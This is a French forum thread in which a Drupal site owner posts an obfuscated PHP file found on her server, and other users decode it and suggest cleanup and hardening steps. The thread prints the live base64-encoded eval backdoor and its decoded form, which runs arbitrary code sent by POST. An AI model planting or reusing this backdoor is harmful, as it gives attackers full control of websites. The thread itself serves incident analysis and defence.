Discussion :

[selinav]

Bonjour,

Après avoir eu l'envoi de mails bloqués par mon hébergeur pour spam, j'ai découvert ceci à la racine de mon site

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
<?php
$_= 
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0='; 
 //system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));
?>

Comment puis-je le décoder pour voir quel champ pose problème dans mon formulaire de contact?

PAr ailleurs comment un fichier a-t-il pu se déposer sur le FTP alors que je suis la seule à avoir les codes d'accès?

Merci de votre aide

[Benjamin Delespierre]

C'est EXTRÊMEMENT DANGEREUX, vire ça tout de suite !

En réalité, ce que ce code fait c'est évaluer l'expression suivante (c'est fait à deux niveau, mais c'est juste de l'encodage base64 en fait).

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
if(isset($_POST["code"]))
{
    eval(base64_decode($_POST["code"]));
}

Heu... Franchement ça fait très peur, c'est un backdoor qui permet à un tiers d'envoyer du code à exécuter sur ton site. Je ne sais pas qui à mis ça là, peut être que quelqu'un à exploité une faille d'un de tes formulaires. Ceux qui on écris ce code l'ont fait de manière à masquer ce qu'ils voulaient faire.

Mon conseil: dégage ça au plus vite surtout !

[selinav]

J'ai supprimé le fichier dès que je l'ai vu, par contre je n'ai pas de champ de formulaire avec un nom de champ 'code' ou

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

$_POST['code']

pourrait faire quelque chose.

Comment ce fichier a-t-il pu arriver là et comment être certaine que d'autres ne seront pas ajouter?

[Doksuri]

facile, avec la console de debug de chrome ou firefox, tu renommes des champs a la volee, donc tu peux en apeller un "code" si tu veux.

apres, c'est un forum d'entraide, pas de hacking.

[Benjamin Delespierre]

Merci pour votre réponse, je l'avais bien compris en puisque j'avais des tentatives d'attaques dans mes logs et mon hébergeur m'a alerté car il y avait du spam. J'ai donc supprimer immédiatement le fichier.

Quelle fonction php permet d'obtenir le code de base?

Comment ce fichier a pu atterrir sur mon site alors que je suis les seules à avoir les codes ftp? Je viens de les changer au cas où, mais comment être sur que ce genre de fichier ne reviendra pas?

Pour info mon site est sous drupal, je viens de faire les mises à jour de sécurité.

Je ne connais pas en détail le fonctionnement interne de Drupal mais mon hypothèse est la suivante: quelqu'un à exploité une faille de sécurité des formulaires de drupal pour provoquer le téléchargement d'un fichier PHP sur la plateforme. Le fichier en question permet à un utilisateur quelconque d'éxecuter n'importe quel morceau de code PHP (code transmis en base64) pour par exemple voler des informations ou, plus vraisemblablement, pour effectuer des campagnes de spam.

Peu importe au final que tu aies un formulaire avec un champ code ou non, il suffit à l'attaquant d'envoyer des fragments de code en POST sur ton serveur en utilisant l'URI de la backdoor pour faire ce qu'il veut.

Vu que tu dépends d'un CMS, tu ne peut pas être certain à 100% qu'il ne présentera aucune faille de sécurité, la meilleure solution pour prévenir ce genre d'attaque est de mettre à jour régulièrement Drupal.

facile, avec la console de debug de chrome ou firefox, tu renommes des champs a la volee, donc tu peux en apeller un "code" si tu veux.

apres, c'est un forum d'entraide, pas de hacking.

En réalité, il existe pléthore de moyens pour envoyer des données POST à un serveur HTTP, entre autres formulaires, CURL, Wrappers etc. Cela fait partie du protocole HTTP.

Je rappelle une fois de plus que POST n'est aucunement plus sécurisé que GET et que vous devez TOUJOURS considérer n'importe quelle données provenant de l'utilisateur comme de la base de données comme tâchée. C'est la responsabilité du programmeur de les valider et de les nettoyer avant de les utiliser (les filtres aident beaucoup à y arriver simplement).
La même remarque s'applique à la réception de fichiers.

[selinav]

merci beaucoup pour vos réponses. J'ai tout mis à jour et je vais rajouter des tests de validation.

[Doksuri]

En réalité, il existe pléthore de moyens pour envoyer des données POST à un serveur HTTP, entre autres formulaires, CURL, Wrappers etc. Cela fait partie du protocole HTTP.

oui, c'est sur, mais je ne savais pas que ca concernait Dupral

[selinav]

moi non plus, car j'ai fait plein de sites drupal et là bam pour un qui à même pas 10 visites / jour !
On n'est jamais trop prudent.

[Benjamin Delespierre]

Bah, les chinois ont des spiders qui cherchent des cibles en permanence, vu que certains CMS font la bêtise d'indiquer leur version dans les balises meta des pages qu'ils produisent, l'attaquant sait tout de suite les vulnérabilités...

Au passage, il est aussi fortement déconseillé d'afficher la version d'Apache et de PHP utilisée (ce qui est pourtant la configuration par défaut d'apache ).

What I know I keep for myself

[selinav]

Drupal contrairement à Wordpress n'indique pas sa version.

Au passage, il est aussi fortement déconseillé d'afficher la version d'Apache et de PHP utilisée (ce qui est pourtant la configuration par défaut d'apache ).

Je suis un hébergement mutualisé d'OVH, est-ce que les pirates ont accès à ses informations?

[Benjamin Delespierre]

C'est assez simple à détermnier, mets un repertoire vide et accessible quelque part, rends toi dedans avec ton navigateur internet et si tu vois la signature d'apache c'est pas bon.

Tu peux la désactiver dans la conf d'apache avec la directive ServerSignature: http://httpd.apache.org/docs/2.0/mod...erversignature

Le problème avec toutes ces signatures logicielles c'est qu'elles donnent des information utiles à des attaquants (surtout les versions), c'est comme se balader dans la cour de récréation en disant "j'ai plein de fric pour mon déjeuner et je sais pas me défendre...", on peut aisément déterminer la suite des évènements...